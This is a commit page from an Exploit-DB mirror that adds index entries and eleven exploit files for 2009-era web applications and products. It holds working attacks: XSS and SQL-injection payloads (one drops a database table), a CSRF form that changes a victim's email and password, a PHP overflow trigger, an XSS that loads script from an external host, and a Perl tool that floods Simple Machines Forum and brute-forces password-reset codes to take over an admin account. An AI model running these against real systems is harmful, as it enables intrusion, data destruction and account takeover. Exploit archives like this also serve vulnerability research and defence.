bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 04_08_2014

Browse source
This commit is contained in:
Offensive Security 2014-04-08 04:35:51 +00:00
parent 943ad97da1
commit 34e961b15d
12 changed files with 351 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -29460,3 +29460,14 @@ id,file,description,date,author,platform,type,port
32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80
32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products Unspecified Remote Command Execution Vulnerability",2009-01-07,"Michel Arboi",windows,remote,0
32712,platforms/multiple/dos/32712.txt,"IBM WebSphere DataPower XML Security Gateway 3.6.1 XS40 Remote Denial Of Service Vulnerability",2009-01-08,Erik,multiple,dos,0
32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS 'open_book.php' SQL Injection Vulnerability",2009-01-07,stylextra,php,webapps,0
32714,platforms/php/webapps/32714.txt,"Visuplay CMS Multiple SQL Injection Vulnerabilities",2009-01-12,"Joseph Giron",php,webapps,0
32715,platforms/php/dos/32715.php,"PHP <= 5.2.8 'popen()' Function Buffer Overflow Vulnerability",2009-01-12,e.wiZz!,php,dos,0
32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/32716.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33217/info
Comersus Cart is prone to a vulnerability that can result in unauthorized access.
An attacker can exploit this issue to gain unauthorized access to the affected application. Successfully exploiting this issue may compromise the application.
Comersus Cart 6 is vulnerable; other versions may also be affected.
<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp"> <table width="421" border="0"> <tr> </tr> <tr> <td width="168">Name</td> <td width="220"> <input type=text name=customerName value="test"> </td> </tr> <tr> <td width="168">Last Name</td> <td width="220"> <input type=text name=lastName value="test"> </td> </tr> <tr> <td width="168">Company</td> <td width="220"> <input type=text name=customerCompany value="test"> </td> </tr> <tr> <td width="168">Phone</td> <td width="220"> <input type=text name=phone value="123456789"> </td> </tr> <tr> <td width="168"><strong>Email</strong></td> <td width="220"> <input type="text" name="email" value="Please Add Mail"> Edit </td> </tr> <tr> <td width="168"><strong>Password</strong></td> <td width="220"> <input type=text name=password value="Please Add Pass"> Edit </td> </tr> <tr> <td width="168">Address</td> <td width="220"> <input type=text name=address value="test"> </td> </tr> <tr> <td width="168">Zip</td> <td width="220"> <input type=text name=zip value="08050"> </td> </tr> <tr> <td width="168">State</td> <td width="220"> <SELECT name=stateCode size=1> <OPTION value="">Select the state <option value="1">Please Type County below </OPTION> </SELECT> </td> </tr> <tr> <td width="168">Non listed state</td> <td width="220"> <input type=text name=state value=""> </td> </tr> <tr> <td width="168">City</td> <td width="220"> <input type=text name=city value="test"> </td> </tr> <tr> <td width="168">Country</td> <td width="220"> <SELECT name=countryCode> <OPTION value="">Select the country <option value="AF" selected>AFGHANISTAN </OPTION> </SELECT> </td> </tr> <tr> <td width="168">&nbsp;</td> <td width="220">&nbsp;</td> </tr> <tr> <td colspan="2"> <input type="submit" name="Modify" value="Modify"> </td> </tr> </table> </form>

37
platforms/jsp/webapps/32708.txt Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/33153/info
Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible.
Versions prior to BusinessManager 4.2 are vulnerable.
POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1
Host: <HOSTNAME> or IP
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16)
Gecko/20080718
Ubuntu/8.04 (hardy) Firefox/2.0.0.16
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.example.com/pagesUTF8/auftrag_allgemeinauftrag.jsp
Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D
Content-Type: application/x-www-form-urlencoded
Content-Length: 1085
TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample&
VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29
%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14
&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01&
DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=&
Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&
LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13&
LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample&
OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2&
REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab=
&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true&
CheckXYZ=Send&yOffsetScroll=0

10
platforms/jsp/webapps/32709.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/33153/info
Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible.
Versions prior to BusinessManager 4.2 are vulnerable.
http://www.example.com/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/
C-00042/PRM

9
platforms/jsp/webapps/32710.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33153/info
Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible.
Versions prior to BusinessManager 4.2 are vulnerable.
http://www.example.com/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs

11
platforms/multiple/dos/32712.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/33169/info
IBM WebSphere DataPower XML Security Gateway XS40 is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input.
Remote attackers can exploit this issue to cause the device to reboot, denying service to legitimate users.
WebSphere DataPower XML Security Gateway XS40 with firmware 3.6.1.5 is affected; other versions may also be vulnerable.
The following string is sufficient to trigger this issue:
?abc?

15
platforms/php/dos/32715.php Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/33216/info
PHP is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.
An attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users.
PHP 5.2.8 and prior versions are vulnerable.
UPDATE (March 4, 2009): Further reports indicate that this issue may not be exploitable as described. We will update this BID pending further investigation.
<?php
$____buff=str_repeat("A",9999);
$handle = popen('/whatever/', $____buff);
echo $handle;
?>

12
platforms/php/webapps/32713.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/33196/info
The tadbook2 module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/*
http://www.example.com/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/*
http://www.example.com/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/*

7
platforms/php/webapps/32714.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/33209/info
Visuplay CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/html/news_article.php?press_id=1;DROP%20table%20news;--&nav_id=7

207
platforms/php/webapps/32717.pl Executable file
View file

@ -0,0 +1,207 @@
source: http://www.securityfocus.com/bid/33219/info
Simple Machines Forum is prone to a security-bypass vulnerability because it fails to adequately restrict access to the password-reset feature.
An attacker can exploit this issue to gain administrative access to the application, which may allow the attacker to compromise the application; other attacks are also possible.
Versions up to and including Simple Machines Forum 1.1.7 are vulnerable.
UPDATE (February 6, 2009): The vendor indicates that this issue was resolved in Simple Machines Forum 1.0.14 and 1.1.6.
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Std;
use LWP::Simple;
use HTTP::Request;
#Author: Xianur0
#Uxmal666[at]gmail.com
# Cracks links Password Recovery
# Find Temporary Files executed by mods
# DB function Flood by Error Log
# File Path Disclosure
# List installed Mods (Useful To Find Mods Vulnerable)
# etc. ..
print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n";
my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL]
[Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l
Installed Mods List \n-b Find Temporary\n-c Cracks links Password
Recovery (Recommended Use Proxy)");
version();
my $proxy = $ARGV[2] || "";
if($ARGV[0] ne "-c" && $proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
getopts('fplbc', \%opt);
crackeador() if $opt{c};
flood() if $opt{f};
path() if $opt{p};
list() if $opt{l};
temp() if $opt{b};
sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}
sub version {
$ua = LWP::UserAgent->new;
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12)
Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /title="Simple Machines Forum" target="_blank">Powered by
SMF (.*?)<\/a>/){
$version = $1;
print "\n[X] SMF Version: $version\n";
if($version < "1.1.7") {
print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X]
http://milw0rm.com/search.php?dong=smf".$version."\n\n";
}
}}}
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print "[X] Directory: $1\n";
} else { print "[!] Getting error Directory!\n";}
}
}
sub flood {
print "[X] Starting Flood! (Press Ctrl + C To Finish)\n";
$texto = "Flood!!!!!" x 15;
$req = HTTP::Request->new(GET =>
$url.'/index.php?action=help;page['.$texto.']=loginout');
&headers;
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print "[-] Sent: ".$i."\n";
} else {
print "[!] HTTP Error Query: " . $res->status_line . "\n";
}
}
}
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url."/".$temp);
&headers;
$res = $ua->request($req);
if ($res->is_success) {
print "[X] Temporary File Found: ".$url."/".$temp."\n";
} else {print "[!] Not Found: ".$url."/".$temp."\n";}
}
}
sub list {
$req = HTTP::Request->new(GET => $url."/Packages/installed.list");
&headers;
$res = $ua->request($req);
if ($res->is_success) {
my $html = $res->content;
my @htmls = split("\n", $html);
foreach $mod (@htmls) {
my @mod = split('\|\^\|', $mod);
print "[X]Package:\nDescription: $mod[0]\nFile:
$url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n";
}
}
}
sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];
$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]\nExample: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128\n");
my $reminder = $url."?action=reminder";
my $smf = $reminder.";sa=setpassword;u=".$id.";code=";
my $proxy = $ARGV[3];
if($proxy ne "") {
$ua->proxy(["http"], "http://".$proxy);
}
sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
$contenedor = $ua->request($content)->as_string;
if ($contenedor =~ /Set-Cookie: (.*?)
/){
print "\n[+] SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
if ($contenedor =~ /<input type="hidden" name="sc" value="(.*?)"/){
print "\n[+] sc Detected: $1\n";
$sc = $1;
} else { die "[!] SC could not be found!\n";}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('user='.$nick.'&sc='.$sc.'&=enviar');
$req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}
print "[x]Sent!\n";
}
sub generador() {
my $password = "";
my @chars = split(" ",
"0 1 2 3 4 5 6 7 8 9 a b c d e
f g h i j k l m n o p q r s t
u v w x y z");
for (my $i=0; $i < 10 ;$i++) {
$_rand = int(rand 35);
$password .= $chars[$_rand];
}
return $password;
}
sub brute() {
while($bucle ne "finito") {
$code = generador();
my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code;
my $content = HTTP::Request->new(GET => $reminder);
my $content = $ua->request($content)->as_string;
if ($content =~ /<input type="hidden" name="sc" value="(.*?)"/){
$sc = $1;
} else { die "[!] SC could not be found!\n";}
if ($content =~ /Set-Cookie: (.*?)
/){
print "\n[+] New SESSION Detected: $1\n";
$session = $1;
} else { die "[!] SESSION could not be found!\n";}
print "[+] Testing Code: ".$code."\n";
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
$req->content_type('application/x-www-form-urlencoded');
$req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc);
$req->header('Cookie' => $session);
$res = $ua->request($req);
if ($res->is_success) {
if($res->content =~ '<input type="text" name="user" size="20" value="') {
print "[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n";
exit;
}
} else { die "[!] HTTP response incorrect!\n";}}}
print "\n[-] Sending Mail...\n\n";
mail();
print "\n[-] Attacking code link recovery...\n";
brute();
}

9
platforms/php/webapps/32718.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33230/info
Ovidentia is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?tg=search&pat=%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E
http://www.example.com/index.php?tg=oml&file=download.html&smap_node_id==%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E

14
platforms/windows/remote/32711.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/33161/info
Multiple CA Service Management products are prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue is the result of insufficient access restrictions.
Successful attacks can compromise the affected application and possibly the underlying computer.
The following applications are vulnerable:
Service Metric Analysis 11.0, 11.1, and 11.1 SP1
Service Level Management 3.5
Submitting the following command through netcat or telnet is sufficient to exploit this issue:
[ipconfig /all]